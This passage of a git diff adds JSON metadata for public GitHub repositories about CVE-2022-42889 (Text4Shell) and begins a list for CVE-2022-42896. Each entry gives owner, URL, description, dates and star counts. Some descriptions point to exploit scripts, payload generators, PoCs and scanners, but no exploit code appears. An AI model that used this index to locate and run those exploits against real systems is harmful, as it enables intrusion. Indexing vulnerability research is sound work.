"2022-10-20T18:07:25Z", + "updated_at": "2024-08-12T20:27:55Z", + "pushed_at": "2022-10-31T16:03:56Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 555394668, + "name": "CVE-2022-42889", + "full_name": "humbss\/CVE-2022-42889", + "owner": { + "login": "humbss", + "id": 17453152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17453152?v=4", + "html_url": "https:\/\/github.com\/humbss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/humbss\/CVE-2022-42889", + "description": null, + "fork": false, + "created_at": "2022-10-21T13:48:04Z", + "updated_at": "2022-10-24T03:11:46Z", + "pushed_at": "2022-10-21T14:01:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 555540963, + "name": "Text4ShellPayloads", + "full_name": "stavrosgns\/Text4ShellPayloads", + "owner": { + "login": "stavrosgns", + "id": 59849433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59849433?v=4", + "html_url": "https:\/\/github.com\/stavrosgns", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stavrosgns\/Text4ShellPayloads", + "description": "This project includes a python script which generates malicious commands leveraging CVE-2022-42889 vulnerability", + "fork": false, + "created_at": "2022-10-21T19:41:56Z", + "updated_at": "2023-09-24T20:21:47Z", + "pushed_at": "2022-10-21T19:57:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 555646270, + "name": "CVE-2022-42889", + "full_name": "s3l33\/CVE-2022-42889", + "owner": { + "login": "s3l33", + "id": 60675004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60675004?v=4", + "html_url": "https:\/\/github.com\/s3l33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s3l33\/CVE-2022-42889", + "description": "python script for CVE-2022-42889", + "fork": false, + "created_at": "2022-10-22T02:06:40Z", + "updated_at": "2022-10-25T07:40:16Z", + "pushed_at": "2022-10-22T02:53:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 555778524, + "name": "CVE-2022-42889-Text4Shell-Docker", + "full_name": "galoget\/CVE-2022-42889-Text4Shell-Docker", + "owner": { + "login": "galoget", + "id": 8353133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8353133?v=4", + "html_url": "https:\/\/github.com\/galoget", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/galoget\/CVE-2022-42889-Text4Shell-Docker", + "description": "Dockerized PoC for CVE-2022-42889 Text4Shell", + "fork": false, + "created_at": "2022-10-22T10:01:13Z", + "updated_at": "2022-10-22T10:03:23Z", + "pushed_at": "2022-10-22T10:03:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 555787805, + "name": "CVE-2022-42889-Text4Shell-Exploit-POC", + "full_name": "rhitikwadhvana\/CVE-2022-42889-Text4Shell-Exploit-POC", + "owner": { + "login": "rhitikwadhvana", + "id": 51850319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51850319?v=4", + "html_url": "https:\/\/github.com\/rhitikwadhvana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhitikwadhvana\/CVE-2022-42889-Text4Shell-Exploit-POC", + "description": "CVE-2022-42889 Text4Shell Exploit POC", + "fork": false, + "created_at": "2022-10-22T10:30:41Z", + "updated_at": "2022-12-13T04:44:38Z", + "pushed_at": "2022-10-22T10:31:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 556131265, + "name": "CVE-2022-42889-POC", + "full_name": "akshayithape-devops\/CVE-2022-42889-POC", + "owner": { + "login": "akshayithape-devops", + "id": 82793140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82793140?v=4", + "html_url": "https:\/\/github.com\/akshayithape-devops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akshayithape-devops\/CVE-2022-42889-POC", + "description": "A simple dockerize application that shows how to exploit the CVE-2022-42889 vulnerability.", + "fork": false, + "created_at": "2022-10-23T05:48:48Z", + "updated_at": "2023-06-26T19:23:44Z", + "pushed_at": "2022-10-23T06:23:03Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 556176876, + "name": "Apache-Commons-Text-CVE-2022-42889", + "full_name": "0xmaximus\/Apache-Commons-Text-CVE-2022-42889", + "owner": { + "login": "0xmaximus", + "id": 63053441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63053441?v=4", + "html_url": "https:\/\/github.com\/0xmaximus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xmaximus\/Apache-Commons-Text-CVE-2022-42889", + "description": "Apache Text4Shell (CVE-2022-42889) Burp Bounty Profile", + "fork": false, + "created_at": "2022-10-23T08:33:02Z", + "updated_at": "2024-10-03T05:16:40Z", + "pushed_at": "2022-10-23T09:02:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "burp-bounty", + "burp-extensions", + "burp-plugin", + "cve-2022-42889", + "cve-2022-42889-expliot", + "text4shell" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 556199653, + "name": "Text4Shell-Scanner", + "full_name": "smileostrich\/Text4Shell-Scanner", + "owner": { + "login": "smileostrich", + "id": 68785480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68785480?v=4", + "html_url": "https:\/\/github.com\/smileostrich", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smileostrich\/Text4Shell-Scanner", + "description": "Vulnerability Scanner for CVE-2022-42889 (Text4Shell)", + "fork": false, + "created_at": "2022-10-23T09:45:41Z", + "updated_at": "2023-04-17T02:29:52Z", + "pushed_at": "2022-10-24T15:00:53Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 556278066, + "name": "CVE-2022-42889-text4shell", + "full_name": "cxzero\/CVE-2022-42889-text4shell", + "owner": { + "login": "cxzero", + "id": 17437230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17437230?v=4", + "html_url": "https:\/\/github.com\/cxzero", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxzero\/CVE-2022-42889-text4shell", + "description": "CVE-2022-42889 aka Text4Shell research & PoC", + "fork": false, + "created_at": "2022-10-23T13:42:23Z", + "updated_at": "2024-10-11T03:18:11Z", + "pushed_at": "2023-03-17T16:15:41Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "poc", + "text4shell" + ], + "visibility": "public", + "forks": 3, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 557311667, + "name": "text4shell-CVE-2022-42889", + "full_name": "Vulnmachines\/text4shell-CVE-2022-42889", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/text4shell-CVE-2022-42889", + "description": null, + "fork": false, + "created_at": "2022-10-25T13:11:24Z", + "updated_at": "2022-10-27T08:30:39Z", + "pushed_at": "2022-10-25T13:15:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 561067220, + "name": "CVE-2022-42889", + "full_name": "Gotcha-1G\/CVE-2022-42889", + "owner": { + "login": "Gotcha-1G", + "id": 103347307, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103347307?v=4", + "html_url": "https:\/\/github.com\/Gotcha-1G", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gotcha-1G\/CVE-2022-42889", + "description": "CVE-2022-42889 Blind-RCE Nuclei Template", + "fork": false, + "created_at": "2022-11-02T21:49:55Z", + "updated_at": "2022-11-03T19:50:13Z", + "pushed_at": "2022-11-02T21:51:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 561912100, + "name": "CVE-2022-42889-RCE", + "full_name": "cryxnet\/CVE-2022-42889-RCE", + "owner": { + "login": "cryxnet", + "id": 75471375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75471375?v=4", + "html_url": "https:\/\/github.com\/cryxnet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cryxnet\/CVE-2022-42889-RCE", + "description": "Proof of Concept for CVE-2022-42889 (Text4Shell Vulnerability) ", + "fork": false, + "created_at": "2022-11-04T19:26:23Z", + "updated_at": "2024-11-24T01:16:48Z", + "pushed_at": "2022-11-21T10:17:03Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "exploit", + "exploits", + "poc", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 562064682, + "name": "CVE-2022-42889-PoC", + "full_name": "sunnyvale-it\/CVE-2022-42889-PoC", + "owner": { + "login": "sunnyvale-it", + "id": 44291039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291039?v=4", + "html_url": "https:\/\/github.com\/sunnyvale-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunnyvale-it\/CVE-2022-42889-PoC", + "description": "CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept", + "fork": false, + "created_at": "2022-11-05T07:32:51Z", + "updated_at": "2023-08-29T21:03:39Z", + "pushed_at": "2022-11-07T07:57:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 562165502, + "name": "cve-2022-42889-jmeter", + "full_name": "QAInsights\/cve-2022-42889-jmeter", + "owner": { + "login": "QAInsights", + "id": 2826376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2826376?v=4", + "html_url": "https:\/\/github.com\/QAInsights", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QAInsights\/cve-2022-42889-jmeter", + "description": "Script to handle CVE 2022-42889", + "fork": false, + "created_at": "2022-11-05T14:08:18Z", + "updated_at": "2024-01-15T15:59:33Z", + "pushed_at": "2022-11-05T15:27:52Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "jmeter" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 562751349, + "name": "Text4shell--Automated-exploit---CVE-2022-42889", + "full_name": "adarshpv9746\/Text4shell--Automated-exploit---CVE-2022-42889", + "owner": { + "login": "adarshpv9746", + "id": 33172696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33172696?v=4", + "html_url": "https:\/\/github.com\/adarshpv9746", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adarshpv9746\/Text4shell--Automated-exploit---CVE-2022-42889", + "description": null, + "fork": false, + "created_at": "2022-11-07T07:19:49Z", + "updated_at": "2022-11-07T07:39:20Z", + "pushed_at": "2022-11-07T09:44:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 568929458, + "name": "Text4shell-exploit", + "full_name": "pwnb0y\/Text4shell-exploit", + "owner": { + "login": "pwnb0y", + "id": 96813659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96813659?v=4", + "html_url": "https:\/\/github.com\/pwnb0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwnb0y\/Text4shell-exploit", + "description": "Python Script to exploit RCE of CVE-2022-42889 ", + "fork": false, + "created_at": "2022-11-21T18:01:28Z", + "updated_at": "2023-11-02T07:39:02Z", + "pushed_at": "2022-11-21T18:17:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-common-text", + "cve-2022-42889", + "cve-2022-42889-expliot", + "java-vulnerability", + "rce", + "text4shell", + "text4shell-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 575527565, + "name": "text4shell-exploit", + "full_name": "gokul-ramesh\/text4shell-exploit", + "owner": { + "login": "gokul-ramesh", + "id": 65040016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65040016?v=4", + "html_url": "https:\/\/github.com\/gokul-ramesh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gokul-ramesh\/text4shell-exploit", + "description": "CVE-2022-42889 - Text4Shell exploit", + "fork": false, + "created_at": "2022-12-07T17:58:59Z", + "updated_at": "2024-08-12T20:28:45Z", + "pushed_at": "2023-03-12T17:06:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "text4shell", + "text4shell-exploit", + "text4shell-poc-exploit" + ], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 576192155, + "name": "text4shellburpscanner", + "full_name": "f0ng\/text4shellburpscanner", + "owner": { + "login": "f0ng", + "id": 48286013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48286013?v=4", + "html_url": "https:\/\/github.com\/f0ng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f0ng\/text4shellburpscanner", + "description": "text4shell(CVE-2022-42889) BurpSuite Scanner", + "fork": false, + "created_at": "2022-12-09T08:18:19Z", + "updated_at": "2024-02-09T17:49:38Z", + "pushed_at": "2022-12-09T09:08:13Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "burp", + "burp-extensions" + ], + "visibility": "public", + "forks": 0, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 607430692, + "name": "text4shell-cve-2022-42889", + "full_name": "devenes\/text4shell-cve-2022-42889", + "owner": { + "login": "devenes", + "id": 66560757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66560757?v=4", + "html_url": "https:\/\/github.com\/devenes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devenes\/text4shell-cve-2022-42889", + "description": "Kubernetes Lab for CVE-2022-42889", + "fork": false, + "created_at": "2023-02-28T00:32:01Z", + "updated_at": "2024-10-04T16:17:52Z", + "pushed_at": "2023-02-28T11:43:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 608352501, + "name": "text4shell", + "full_name": "hotblac\/text4shell", + "owner": { + "login": "hotblac", + "id": 4406140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4406140?v=4", + "html_url": "https:\/\/github.com\/hotblac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotblac\/text4shell", + "description": "A demonstration of CVE-2022-42889 (text4shell) remote code execution vulnerability", + "fork": false, + "created_at": "2023-03-01T20:56:37Z", + "updated_at": "2023-03-01T20:57:17Z", + "pushed_at": "2023-03-12T17:34:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 623655257, + "name": "CVE-2022-42889", + "full_name": "necroteddy\/CVE-2022-42889", + "owner": { + "login": "necroteddy", + "id": 37003131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37003131?v=4", + "html_url": "https:\/\/github.com\/necroteddy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/necroteddy\/CVE-2022-42889", + "description": "docker for CVE-2022-42889", + "fork": false, + "created_at": "2023-04-04T20:08:08Z", + "updated_at": "2023-04-19T05:53:19Z", + "pushed_at": "2023-04-19T05:53:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625082348, + "name": "cve-2022-42889-text4shell-docker", + "full_name": "ReachabilityOrg\/cve-2022-42889-text4shell-docker", + "owner": { + "login": "ReachabilityOrg", + "id": 129769214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129769214?v=4", + "html_url": "https:\/\/github.com\/ReachabilityOrg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ReachabilityOrg\/cve-2022-42889-text4shell-docker", + "description": null, + "fork": false, + "created_at": "2023-04-08T02:47:55Z", + "updated_at": "2023-04-08T02:48:07Z", + "pushed_at": "2023-04-11T15:43:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 625424909, + "name": "cve-2022-42889-text4shell-docker", + "full_name": "dgor2023\/cve-2022-42889-text4shell-docker", + "owner": { + "login": "dgor2023", + "id": 130265095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130265095?v=4", + "html_url": "https:\/\/github.com\/dgor2023", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dgor2023\/cve-2022-42889-text4shell-docker", + "description": null, + "fork": false, + "created_at": "2023-04-09T04:09:34Z", + "updated_at": "2023-04-09T04:09:46Z", + "pushed_at": "2023-04-12T02:32:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 629556451, + "name": "cve-2022-42889-text4shell", + "full_name": "Dima2021\/cve-2022-42889-text4shell", + "owner": { + "login": "Dima2021", + "id": 61808880, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61808880?v=4", + "html_url": "https:\/\/github.com\/Dima2021", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dima2021\/cve-2022-42889-text4shell", + "description": null, + "fork": false, + "created_at": "2023-04-18T14:49:45Z", + "updated_at": "2023-04-18T15:01:22Z", + "pushed_at": "2023-04-18T15:12:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643789911, + "name": "text4shell-docker", + "full_name": "aaronm-sysdig\/text4shell-docker", + "owner": { + "login": "aaronm-sysdig", + "id": 132866139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132866139?v=4", + "html_url": "https:\/\/github.com\/aaronm-sysdig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaronm-sysdig\/text4shell-docker", + "description": "Dockerized POC for CVE-2022-42889 Text4Shell", + "fork": false, + "created_at": "2023-05-22T06:57:55Z", + "updated_at": "2023-05-23T07:32:45Z", + "pushed_at": "2024-01-05T10:18:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 659148388, + "name": "CVE-2022-42889-Text4Shell-POC", + "full_name": "gustanini\/CVE-2022-42889-Text4Shell-POC", + "owner": { + "login": "gustanini", + "id": 47717581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47717581?v=4", + "html_url": "https:\/\/github.com\/gustanini", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gustanini\/CVE-2022-42889-Text4Shell-POC", + "description": "This repository contains a Python script to automate the process of testing for a vulnerability known as Text4Shell, referenced under the CVE id: CVE-2022-42889. ", + "fork": false, + "created_at": "2023-06-27T08:29:24Z", + "updated_at": "2024-10-15T16:19:30Z", + "pushed_at": "2023-06-27T09:01:14Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 687770707, + "name": "CVE-2022-42889", + "full_name": "Sic4rio\/CVE-2022-42889", + "owner": { + "login": "Sic4rio", + "id": 75425513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75425513?v=4", + "html_url": "https:\/\/github.com\/Sic4rio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sic4rio\/CVE-2022-42889", + "description": "Text4Shell", + "fork": false, + "created_at": "2023-09-06T01:13:26Z", + "updated_at": "2023-09-06T01:15:32Z", + "pushed_at": "2023-09-06T01:15:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689311131, + "name": "CVE-2022-42889", + "full_name": "34006133\/CVE-2022-42889", + "owner": { + "login": "34006133", + "id": 143711860, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143711860?v=4", + "html_url": "https:\/\/github.com\/34006133", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/34006133\/CVE-2022-42889", + "description": "RCE PoC for Apache Commons Text vuln", + "fork": false, + "created_at": "2023-09-09T12:11:36Z", + "updated_at": "2023-09-11T00:54:20Z", + "pushed_at": "2023-09-10T13:32:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 695246530, + "name": "cve-2022-42889-text4shell", + "full_name": "DimaMend\/cve-2022-42889-text4shell", + "owner": { + "login": "DimaMend", + "id": 145161091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145161091?v=4", + "html_url": "https:\/\/github.com\/DimaMend", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DimaMend\/cve-2022-42889-text4shell", + "description": null, + "fork": false, + "created_at": "2023-09-22T17:17:26Z", + "updated_at": "2023-09-22T17:17:44Z", + "pushed_at": "2024-12-20T00:06:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 754828377, + "name": "cve-2022-42889-text4shell", + "full_name": "joshbnewton31080\/cve-2022-42889-text4shell", + "owner": { + "login": "joshbnewton31080", + "id": 88124465, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88124465?v=4", + "html_url": "https:\/\/github.com\/joshbnewton31080", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joshbnewton31080\/cve-2022-42889-text4shell", + "description": null, + "fork": false, + "created_at": "2024-02-08T20:54:23Z", + "updated_at": "2024-02-08T20:54:36Z", + "pushed_at": "2024-02-08T20:54:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 754828660, + "name": "cve-2022-42889-text4shell", + "full_name": "MendDemo-josh\/cve-2022-42889-text4shell", + "owner": { + "login": "MendDemo-josh", + "id": 109741065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109741065?v=4", + "html_url": "https:\/\/github.com\/MendDemo-josh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MendDemo-josh\/cve-2022-42889-text4shell", + "description": null, + "fork": false, + "created_at": "2024-02-08T20:55:09Z", + "updated_at": "2024-02-08T20:55:23Z", + "pushed_at": "2024-12-21T12:11:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42896.json b/2022/CVE-2022-42896.json new file mode 100644 index 0000000000..4fe01556b4 --- /dev/null +++ b/2022/CVE-2022-42896.json @@ -0,0 +1,157 @@ +[ + { + "id": 623797649, + "name": "linux-4.19.72_CVE-2022-42896", + "full_name": "Satheesh575555\/linux-4.19.72_CVE-2022-42896", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.19.72_CVE-2022-42896", + "description": null, + "fork": false, + "created_at": "2023-04-05T05:33:09Z", + "updated_at": "2023-04-05T06:24:18Z", + "pushed_at": "2023-04-05T05:36:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623842429, + "name": "kernel_v4.19.72_CVE-2022-42896_old", + "full_name": "hshivhare67\/kernel_v4.19.72_CVE-2022-42896_old", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.19.72_CVE-2022-42896_old", + "description": null, + "fork": false, + "created_at": "2023-04-05T07:51:32Z", + "updated_at": "2023-04-06T05:17:04Z", + "pushed_at": "2023-04-06T11:21:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623871240, + "name": "linux-4.19.72_CVE-2022-42896", + "full_name": "Trinadh465\/linux-4.19.72_CVE-2022-42896", 